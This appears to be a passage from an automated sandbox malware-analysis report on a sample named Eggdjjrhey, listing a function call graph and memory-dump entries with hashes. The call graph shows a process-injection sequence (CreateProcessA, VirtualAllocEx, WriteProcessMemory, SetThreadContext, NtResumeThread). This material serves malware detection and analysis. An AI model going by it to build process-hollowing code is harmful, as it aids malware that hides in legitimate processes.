47203->47228 47229 5a5a709 3 API calls 47203->47229 47230 5a5a58a 2 API calls 47203->47230 47231 5a5a3ca 2 API calls 47203->47231 47232 5a59f13 2 API calls 47203->47232 47233 5a5aa52 2 API calls 47203->47233 47234 5a5a658 4 API calls 47203->47234 47235 5a5a1db 3 API calls 47203->47235 47204 5a59df7 47204->47160 47205->47204 47206->47204 47207->47204 47208->47204 47209->47204 47210->47204 47211->47204 47212->47204 47213->47204 47214->47204 47215->47204 47216->47204 47217->47204 47218->47204 47219->47204 47220->47204 47221->47204 47222->47204 47223->47204 47224->47204 47225->47204 47226->47204 47227->47204 47228->47204 47229->47204 47230->47204 47231->47204 47232->47204 47233->47204 47234->47204 47235->47204 47237 5a59f49 47236->47237 47237->47236 47377 5a3ec80 47237->47377 47381 5a3ec88 47237->47381 47241 5a5a1e1 47240->47241 47385 5a3ede8 47241->47385 47242 5a59f49 47243 5a3ec80 VirtualAllocEx 47242->47243 47244 5a3ec88 VirtualAllocEx 47242->47244 47243->47242 47244->47242 47247 5a59f49 47246->47247 47248 5a5a94c 47246->47248 47250 5a3ec80 VirtualAllocEx 47247->47250 47251 5a3ec88 VirtualAllocEx 47247->47251 47389 5a3f000 47248->47389 47393 5a3eff8 47248->47393 47249 5a5a98d 47249->47170 47250->47247 47251->47247 47255 5a59f49 47254->47255 47256 5a3ec80 VirtualAllocEx 47255->47256 47257 5a3ec88 VirtualAllocEx 47255->47257 47256->47255 47257->47255 47259 5a59f24 47258->47259 47260 5a3ec80 VirtualAllocEx 47259->47260 47261 5a3ec88 VirtualAllocEx 47259->47261 47260->47259 47261->47259 47398 5a5cd41 47262->47398 47404 5a5cd98 47262->47404 47409 5a5cd88 47262->47409 47263 5a5a3e2 47268 5a5a594 47267->47268 47270 5a3e720 Wow64SetThreadContext 47268->47270 47271 5a3e728 Wow64SetThreadContext 47268->47271 47269 5a5ab34 47270->47269 47271->47269 47273 5a5a726 47272->47273 47277 5a3ede8 WriteProcessMemory 47273->47277 47274 5a59f49 47275 5a3ec80 VirtualAllocEx 47274->47275 47276 5a3ec88 VirtualAllocEx 47274->47276 47275->47274 47276->47274 47277->47274 47279 5a59f49 47278->47279 47280 5a3ec80 VirtualAllocEx 47279->47280 47281 5a3ec88 VirtualAllocEx 47279->47281 47280->47279 47281->47279 47283 5a59f49 47282->47283 47284 5a3ec80 VirtualAllocEx 47283->47284 47285 5a3ec88 VirtualAllocEx 47283->47285 47284->47283 47285->47283 47287 5a59f49 47286->47287 47288 5a3ec80 VirtualAllocEx 47287->47288 47289 5a3ec88 VirtualAllocEx 47287->47289 47288->47287 47289->47287 47291 5a59f49 47290->47291 47292 5a3ec80 VirtualAllocEx 47291->47292 47293 5a3ec88 VirtualAllocEx 47291->47293 47292->47291 47293->47291 47295 5a59f49 47294->47295 47296 5a3ec80 VirtualAllocEx 47295->47296 47297 5a3ec88 VirtualAllocEx 47295->47297 47296->47295 47297->47295 47299 5a59f49 47298->47299 47300 5a3ec80 VirtualAllocEx 47299->47300 47301 5a3ec88 VirtualAllocEx 47299->47301 47300->47299 47301->47299 47303 5a59f49 47302->47303 47304 5a3ec80 VirtualAllocEx 47303->47304 47305 5a3ec88 VirtualAllocEx 47303->47305 47304->47303 47305->47303 47307 5a59f49 47306->47307 47308 5a3ec80 VirtualAllocEx 47307->47308 47309 5a3ec88 VirtualAllocEx 47307->47309 47308->47307 47309->47307 47311 5a59f49 47310->47311 47312 5a3ec80 VirtualAllocEx 47311->47312 47313 5a3ec88 VirtualAllocEx 47311->47313 47312->47311 47313->47311 47315 5a59f49 47314->47315 47316 5a3ec80 VirtualAllocEx 47315->47316 47317 5a3ec88 VirtualAllocEx 47315->47317 47316->47315 47317->47315 47319 5a59f49 47318->47319 47320 5a3ec80 VirtualAllocEx 47319->47320 47321 5a3ec88 VirtualAllocEx 47319->47321 47320->47319 47321->47319 47323 5a59f49 47322->47323 47324 5a3ec80 VirtualAllocEx 47323->47324 47325 5a3ec88 VirtualAllocEx 47323->47325 47324->47323 47325->47323 47327 5a59f49 47326->47327 47328 5a3ec80 VirtualAllocEx 47327->47328 47329 5a3ec88 VirtualAllocEx 47327->47329 47328->47327 47329->47327 47331 5a5a972 47330->47331 47333 5a3f000 NtResumeThread 47331->47333 47334 5a3eff8 NtResumeThread 47331->47334 47332 5a5a98d 47332->47170 47333->47332 47334->47332 47336 5a59f49 47335->47336 47337 5a3ec80 VirtualAllocEx 47336->47337 47338 5a3ec88 VirtualAllocEx 47336->47338 47337->47336 47338->47336 47340 5a59f49 47339->47340 47341 5a3ec80 VirtualAllocEx 47340->47341 47342 5a3ec88 VirtualAllocEx 47340->47342 47341->47340 47342->47340 47344 5a59f49 47343->47344 47345 5a3ec80 VirtualAllocEx 47344->47345 47346 5a3ec88 VirtualAllocEx 47344->47346 47345->47344 47346->47344 47348 5a59f49 47347->47348 47349 5a3ec80 VirtualAllocEx 47348->47349 47350 5a3ec88 VirtualAllocEx 47348->47350 47349->47348 47350->47348 47352 5a59f79 47351->47352 47422 5a5b499 47352->47422 47426 5a5b4a8 47352->47426 47353 5a59f49 47354 5a3ec80 VirtualAllocEx 47353->47354 47355 5a3ec88 VirtualAllocEx 47353->47355 47354->47353 47355->47353 47359 5a5a7fe 47358->47359 47361 5a3ede8 WriteProcessMemory 47359->47361 47360 5a5a6b2 47361->47360 47363 5a59f49 47362->47363 47364 5a3ec80 VirtualAllocEx 47363->47364 47365 5a3ec88 VirtualAllocEx 47363->47365 47364->47363 47365->47363 47367 5a5ae82 47366->47367 47443 5a5cc08 47367->47443 47448 5a5cc18 47367->47448 47368 5a59f49 47369 5a3ec80 VirtualAllocEx 47368->47369 47370 5a3ec88 VirtualAllocEx 47368->47370 47369->47368 47370->47368 47374 5a59f49 47373->47374 47375 5a3ec80 VirtualAllocEx 47374->47375 47376 5a3ec88 VirtualAllocEx 47374->47376 47375->47374 47376->47374 47378 5a3ec88 VirtualAllocEx 47377->47378 47380 5a3ed44 47378->47380 47380->47237 47382 5a3eccc VirtualAllocEx 47381->47382 47384 5a3ed44 47382->47384 47384->47237 47386 5a3ee34 WriteProcessMemory 47385->47386 47388 5a3eecd 47386->47388 47388->47242 47390 5a3f049 NtResumeThread 47389->47390 47392 5a3f097 47390->47392 47392->47249 47394 5a3effb NtResumeThread 47393->47394 47395 5a3ef9f 47393->47395 47397 5a3f097 47394->47397 47395->47249 47397->47249 47399 5a5cd83 47398->47399 47400 5a5cd4a 47398->47400 47414 5a3e720 47399->47414 47418 5a3e728 47399->47418 47400->47263 47401 5a5cdc6 47401->47263 47405 5a5cdad 47404->47405 47407 5a3e720 Wow64SetThreadContext 47405->47407 47408 5a3e728 Wow64SetThreadContext 47405->47408 47406 5a5cdc6 47406->47263 47407->47406 47408->47406 47410 5a5cd98 47409->47410 47412 5a3e720 Wow64SetThreadContext 47410->47412 47413 5a3e728 Wow64SetThreadContext 47410->47413 47411 5a5cdc6 47411->47263 47412->47411 47413->47411 47415 5a3e728 Wow64SetThreadContext 47414->47415 47417 5a3e7e9 47415->47417 47417->47401 47419 5a3e771 Wow64SetThreadContext 47418->47419 47421 5a3e7e9 47419->47421 47421->47401 47423 5a5b4bf 47422->47423 47424 5a5b4e1 47423->47424 47430 5a5b882 47423->47430 47424->47353 47427 5a5b4bf 47426->47427 47428 5a5b4e1 47427->47428 47429 5a5b882 2 API calls 47427->47429 47428->47353 47429->47428 47431 5a5b888 47430->47431 47435 5a3e370 47431->47435 47439 5a3e364 47431->47439 47436 5a3e3f0 CreateProcessA 47435->47436 47438 5a3e5ec 47436->47438 47440 5a3e3f0 CreateProcessA 47439->47440 47442 5a3e5ec 47440->47442 47444 5a5cc2d 47443->47444 47446 5a3ec80 VirtualAllocEx 47444->47446 47447 5a3ec88 VirtualAllocEx 47444->47447 47445 5a5cc4f 47445->47368 47446->47445 47447->47445 47449 5a5cc2d 47448->47449 47451 5a3ec80 VirtualAllocEx 47449->47451 47452 5a3ec88 VirtualAllocEx 47449->47452 47450 5a5cc4f 47450->47368 47451->47450 47452->47450 47473 8ad030 47474 8ad048 47473->47474 47475 8ad0a3 47474->47475 47477 5c2dfb0 47474->47477 47478 5c2e009 47477->47478 47481 5c2e540 47478->47481 47479 5c2e03e 47482 5c2e56d 47481->47482 47483 5c2d3e8 VirtualProtect 47482->47483 47485 5c2e703 47482->47485 47484 5c2e6f4 47483->47484 47484->47479 47485->47479 47486 5a361e8 47487 5a361fd 47486->47487 47490 5a362c6 47487->47490 47492 5a362e8 47490->47492 47491 5a363ca 47492->47491 47496 5a3f2d3 47492->47496 47500 5a3f2d8 47492->47500 47504 5a3f28b 47492->47504 47497 5a3f2d8 VirtualProtect 47496->47497 47499 5a3f38e 47497->47499 47499->47492 47501 5a3f321 VirtualProtect 47500->47501 47503 5a3f38e 47501->47503 47503->47492 47505 5a3f303 VirtualProtect 47504->47505 47507 5a3f292 47504->47507 47508 5a3f38e 47505->47508 47507->47492 47508->47492
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2374884418.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_59e0000_Eggdjjrhey.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4
                                                              • API String ID: 0-4088798008
                                                              • Opcode ID: 22a168f5bd96e3aa4e0ba0c6e07888772b7ac3facf35ad721929ef3612a2e140
                                                              • Instruction ID: 15ef0d8719d9d0eae8fb3b7fba9642dee9e56e9f0cffff96dbaf0b4d3c59e9d7
                                                              • Opcode Fuzzy Hash: 22a168f5bd96e3aa4e0ba0c6e07888772b7ac3facf35ad721929ef3612a2e140
                                                              • Instruction Fuzzy Hash: 8CB2E834A00218DFDB15DFA4C994BADBBBABF48300F158599E506AB3A5DB70ED81CF50
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2327326021.0000000002330000.00000040.00000800.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2330000_Eggdjjrhey.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6e3d8198b5a8623e5a88397c7d92a6f402ed24aca51aa8403f66a950327c1cfa
                                                              • Instruction ID: 633b46d53d98f00e2885bc2ccb955902b2e9e8b8036c3236e3a54d91ec6c6ff1
                                                              • Opcode Fuzzy Hash: 6e3d8198b5a8623e5a88397c7d92a6f402ed24aca51aa8403f66a950327c1cfa
                                                              • Instruction Fuzzy Hash: A1A2C575A00628CFDB65CF69C984B99BBB2FF89304F1581E9D509AB325DB319E81CF40
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2374884418.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_59e0000_Eggdjjrhey.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d1915d9426d8386b328c3eb9e4d144925a92e15950047397402fa3d1d37e5c79
                                                              • Instruction ID: b32ddece618745824ec84fa5a07e7886bf14a3bcb5aba57b4a99985c481bb22c
                                                              • Opcode Fuzzy Hash: d1915d9426d8386b328c3eb9e4d144925a92e15950047397402fa3d1d37e5c79
                                                              • Instruction Fuzzy Hash: 46220334B00205CFDB15DF28C984A6EBBF6BF88715B1684A9E506DB3A5DB71EC41CB60
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2375788150.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_5a70000_Eggdjjrhey.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1f3c9a87d78ae1926250986ccb74b6e173b616a9e7c2bb7907661f0cf9933041
                                                              • Instruction ID: a986cb1dc6168ef47b3b0b6fb675bec1c5d7baad276d9058df6f36bbc58bea00
                                                              • Opcode Fuzzy Hash: 1f3c9a87d78ae1926250986ccb74b6e173b616a9e7c2bb7907661f0cf9933041
                                                              • Instruction Fuzzy Hash: 1BE1F374E0561CCFEB24CF69D984BADBBF2BF4A304F1480A9D419AB295DB745985CF00
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2375788150.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_5a70000_Eggdjjrhey.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 63f69cc1879c6ca71d45dbf0aba59eb7c4fef1156ffd3392fc7728b7dce1bff6
                                                              • Instruction ID: fe47061682213aba10c1f9aa72fe87c2696341bb0737d2c4dd0f04ba2a9425e6
                                                              • Opcode Fuzzy Hash: 63f69cc1879c6ca71d45dbf0aba59eb7c4fef1156ffd3392fc7728b7dce1bff6
                                                              • Instruction Fuzzy Hash: 6BD1F574E0561CCFEB24CF65D984BADBBF2BF4A304F1480A9D419AB291DB745985CF00
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2375788150.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_5a70000_Eggdjjrhey.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 42bfc13959a01ef3487c17b0ce711e78cf2e5b2e94962ae3861966edeec69836
                                                              • Instruction ID: 06c3ea39a4e9146dc178ea959a729cb8b42109c47819ec3a456073ea4fe6a404
                                                              • Opcode Fuzzy Hash: 42bfc13959a01ef3487c17b0ce711e78cf2e5b2e94962ae3861966edeec69836
                                                              • Instruction Fuzzy Hash: 83C1E374E0560CCFDB64CFA5D988BADBBF2BF4A304F5480A9E419AB291DB745985CF00
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2375788150.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_5a70000_Eggdjjrhey.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7d6a3b2c28070a9259694a9a452db15931297a36809da16b0c81ba60b0efbc2a
                                                              • Instruction ID: 3eac8dee7b8e6339be7b658383d61f6c7ad125b9606f81c0a74d083a53f54a6c
                                                              • Opcode Fuzzy Hash: 7d6a3b2c28070a9259694a9a452db15931297a36809da16b0c81ba60b0efbc2a
                                                              • Instruction Fuzzy Hash: E6B1E670E05A1CCFDB14DFA9D984BADBBF2BF49300F2090AAE419AB255DB705985CF00

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 5a70d50-5a70d56 1 5a70d5e-5a70d6b 0->1 2 5a70d71-5a70d79 1->2 3 5a712da-5a7132e 1->3 4 5a7011f-5a70127 2->4 12 5a70be5-5a70bf4 3->12 13 5a71334-5a71359 3->13 5 5a70130-5a70131 4->5 6 5a70129 4->6 8 5a70ced 5->8 6->5 8->0 15 5a70c00-5a70c18 call 5ea5298 12->15 13->4 16 5a7135f-5a71367 13->16 17 5a70c1d-5a70c3b 15->17 16->4 17->8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2375788150.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_5a70000_Eggdjjrhey.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %$9
                                                              • API String ID: 0-1865036983
                                                              • Opcode ID: 97514d8693ff9e2b4c5302843b62983c8fe3c75d6263c5f449858f7ab3b1db45
                                                              • Instruction ID: ae9d9a4f4582ee047ebc8b405f6014f0d8d479670107e507ae4597f6d255147e
                                                              • Opcode Fuzzy Hash: 97514d8693ff9e2b4c5302843b62983c8fe3c75d6263c5f449858f7ab3b1db45
                                                              • Instruction Fuzzy Hash: EE31A074A0522DCFDB64EF20C888BADBBB6BB49310F5094EAD50AA7250DB305EC4CF51

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 20 5a71221-5a7122f 22 5a71231-5a71256 20->22 23 5a71279-5a7128b call 5ea9490 20->23 26 5a7011f-5a70127 22->26 27 5a7125c-5a71264 22->27 24 5a71290-5a712c7 23->24 24->26 31 5a712cd-5a712d5 24->31 29 5a70130-5a70131 26->29 30 5a70129 26->30 27->26 32 5a70ced-5a70d6b 29->32 30->29 31->26 35 5a70d71-5a70d79 32->35 36 5a712da-5a7132e 32->36 35->26 41 5a70be5-5a70c18 call 5ea5298 36->41 42 5a71334-5a71359 36->42 46 5a70c1d-5a70c3b 41->46 42->26 45 5a7135f-5a71367 42->45 45->26 46->32
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2375788150.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_5a70000_Eggdjjrhey.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 3$q
                                                              • API String ID: 0-260448983
                                                              • Opcode ID: f4aa90df9547296b51d3a505eab4d039b43381bc4f05ec6ce00503049c3dc676
                                                              • Instruction ID: e4dfafbe5ac5c6965d30f2a584f15192f80f725d9b02253e30cc1ca2bd77881f
                                                              • Opcode Fuzzy Hash: f4aa90df9547296b51d3a505eab4d039b43381bc4f05ec6ce00503049c3dc676
                                                              • Instruction Fuzzy Hash: BF1158B090422C8FDB65AF64C88ABE9BBF1BB09310F1054EAD609A6251CB745AC5CF94
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2374832390.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_59d0000_Eggdjjrhey.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f8236379ae6715a705d41f11f4da418179db4c6dda0025aa6e73c146bfcc0e95
                                                              • Instruction ID: 3676f99dc08141b0c70919b79455648931bc62ffbe61f053fcacd832f0384ec0
                                                              • Opcode Fuzzy Hash: f8236379ae6715a705d41f11f4da418179db4c6dda0025aa6e73c146bfcc0e95
                                                              • Instruction Fuzzy Hash: 88F28071909388DFDB16CBA4CC59BAEBFB9FF06300F158196E101AB292D7789845CB71
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 05C2D96C
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2376094401.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_5c20000_Eggdjjrhey.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: f168bf9ca03be9cbb1d63002f9aa049b7acaf2eafa00248bbdd1ce95b8e4b038
                                                              • Instruction ID: 547273bdb26b235bcd8b014e15a4b2027af0386b29376ee936e34d0d605fc569
                                                              • Opcode Fuzzy Hash: f168bf9ca03be9cbb1d63002f9aa049b7acaf2eafa00248bbdd1ce95b8e4b038
                                                              • Instruction Fuzzy Hash: 8631A9B4D012589FDF10CFA9D980A9EFBB1BF49310F20942AE815B7210D775A945CF94
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 05C2EB2F
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2376094401.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_5c20000_Eggdjjrhey.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 4b5db5dd3d69590c5a07bda541d54d517da02daf888d2dc0f07666a8983ea318
                                                              • Instruction ID: e372437a7c819020cb498a6e539bc5fe854120c1dad9be8b395a61c5a09376bd
                                                              • Opcode Fuzzy Hash: 4b5db5dd3d69590c5a07bda541d54d517da02daf888d2dc0f07666a8983ea318
                                                              • Instruction Fuzzy Hash: 7B31B8B5D00258DFDF10CFA9D880AAEFBB5BF49310F24A42AE815B7210D775A945CF98
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2374832390.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_59d0000_Eggdjjrhey.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ec089b403def90cbcab6106e2c78328add1fbac55bca1a012214c1b4f27dcf07
                                                              • Instruction ID: 75d614840cc5bcc558650367d0348813edebb8ba42aca424b566b71716927041
                                                              • Opcode Fuzzy Hash: ec089b403def90cbcab6106e2c78328add1fbac55bca1a012214c1b4f27dcf07
                                                              • Instruction Fuzzy Hash: F9A25FB154E3C8AFDB168774CD5AB9A7F78AB03304F19419AE140DB2E3D6B89844C772
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2376468063.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_5e90000_Eggdjjrhey.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "
                                                              • API String ID: 0-123907689
                                                              • Opcode ID: 3c79ba224faa441a28f0a850751beff72e8919b8f32bd727621a4272997192ed
                                                              • Instruction ID: 7b2f6d83b114bd5cb3430a3e5cf85ce8401a96280d92f837835d814a937ffdce
                                                              • Opcode Fuzzy Hash: 3c79ba224faa441a28f0a850751beff72e8919b8f32bd727621a4272997192ed
                                                              • Instruction Fuzzy Hash: 85211870A02229CFEB24DF28C858BE9B7B1FB49304F5054EAD409E3680DB344E889F01
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2375788150.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_5a70000_Eggdjjrhey.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 7
                                                              • API String ID: 0-1790921346
                                                              • Opcode ID: 1ef87aa90ebd709a4e41a8f486c249353e6214676ae4cc5491001861de9d50f3
                                                              • Instruction ID: f194f09b0314795427e52f9c9efe9109b7a337692a73efff91bc5776d5edc992
                                                              • Opcode Fuzzy Hash: 1ef87aa90ebd709a4e41a8f486c249353e6214676ae4cc5491001861de9d50f3
                                                              • Instruction Fuzzy Hash: BA0119B0915218CFEB149F24ED48B9C7FB0FB05354F1088E9D259A7282DB344A859F55
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2375788150.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_5a70000_Eggdjjrhey.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 5
                                                              • API String ID: 0-2226203566
                                                              • Opcode ID: fb0c0be329b90a14be8f38fa7caeefc674c9042794e19669e6f787d43f4589db
                                                              • Instruction ID: 9c05f4dd5805550755de94d7c34059977251875a23ac8fc1e5df21501eaf73e1
                                                              • Opcode Fuzzy Hash: fb0c0be329b90a14be8f38fa7caeefc674c9042794e19669e6f787d43f4589db
                                                              • Instruction Fuzzy Hash: 96F05A7491122CCFDB25CFA4C889BEDBBB5BB09315F1051DAE909A2240D7705A85CF50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2375788150.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_5a70000_Eggdjjrhey.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6
                                                              • API String ID: 0-498629140
                                                              • Opcode ID: 68469a910d1b8dd5fb86754e9fc571caa13434a4e93a340edd1894041962d6c0
                                                              • Instruction ID: babfd90c7d66189bbcb468838e8a0ebb42211ce9d1ae391a618b6336d6c4e79a
                                                              • Opcode Fuzzy Hash: 68469a910d1b8dd5fb86754e9fc571caa13434a4e93a340edd1894041962d6c0
                                                              • Instruction Fuzzy Hash: B0D09270A0061DEFEB64DF24DD49B8A7BB5AB86340F0056D9904966160CE701AC48F01
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2374884418.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_59e0000_Eggdjjrhey.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aaff445e03a74c4fccdeb6caac3d38d1a93b233f6d1bab3223522b0ae27e9831
                                                              • Instruction ID: 4cf00362d479e38286c1a9c4675a47440a9e696fde860c28b12c45dc3e014050
                                                              • Opcode Fuzzy Hash: aaff445e03a74c4fccdeb6caac3d38d1a93b233f6d1bab3223522b0ae27e9831
                                                              • Instruction Fuzzy Hash: DC522875A102288FDB25DF68C985BADBBF6BF88300F1540D9E509E7361DA309E81CF61
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2374884418.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_59e0000_Eggdjjrhey.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b82bafe216acab6c4717ab5fa0a08b9d98ebf30f07bbf66b87d4a242fb07c17f
                                                              • Instruction ID: a33a43c2dc868dc52607bdb3277df272f01389251cf1156a6038457017dbc251
                                                              • Opcode Fuzzy Hash: b82bafe216acab6c4717ab5fa0a08b9d98ebf30f07bbf66b87d4a242fb07c17f
                                                              • Instruction Fuzzy Hash: 16228E35A102049FCB05DF68C895AADBBF6FF88310F158069E90AEB365DB71ED41CB90
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2374884418.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_59e0000_Eggdjjrhey.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6862c0ad316bf857cf66f326c3be19a53c24c6b0ed6ccb836741984c421aa723
                                                              • Instruction ID: d9c6161975ef9db2c5d4e1b297c0a9e7e4fd07d276b72a70148bc3273e9ccb9f
                                                              • Opcode Fuzzy Hash: 6862c0ad316bf857cf66f326c3be19a53c24c6b0ed6ccb836741984c421aa723
                                                              • Instruction Fuzzy Hash: 9F126C30A006048FDB25DFA9D885A6EBBF6FF88300F14852DE506AB395DB35ED46CB51
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2374884418.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_59e0000_Eggdjjrhey.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3466388e1808ffe7f4815eb41b345f21b4b6154ead02d36dccb7dc8184b5bd5a
                                                              • Instruction ID: a1cd4389855bf11a85ce25fe053b88f1648c05baed64c26575a5f3f4f5c00d5b
                                                              • Opcode Fuzzy Hash: 3466388e1808ffe7f4815eb41b345f21b4b6154ead02d36dccb7dc8184b5bd5a
                                                              • Instruction Fuzzy Hash: 6C12F834B102188FCB15EF64C894A9DBBB2BF89300F5585A8E54AAB355DF70ED86CF40
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2374884418.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_59e0000_Eggdjjrhey.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5363a44114067e64a0960f18428f030ed1d2afb7802e660c51c94d86c2016ca6
                                                              • Instruction ID: 9299a0418af95bd2c2f1fef2a9ad462c1374db64c46546a06b9e6622fd004c08
                                                              • Opcode Fuzzy Hash: 5363a44114067e64a0960f18428f030ed1d2afb7802e660c51c94d86c2016ca6
                                                              • Instruction Fuzzy Hash: 7DE17F707146028FDB1AAF68D896B3E7AE3FF88300F545429E582CB3D5EA34DD518B52
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2374884418.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_59e0000_Eggdjjrhey.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
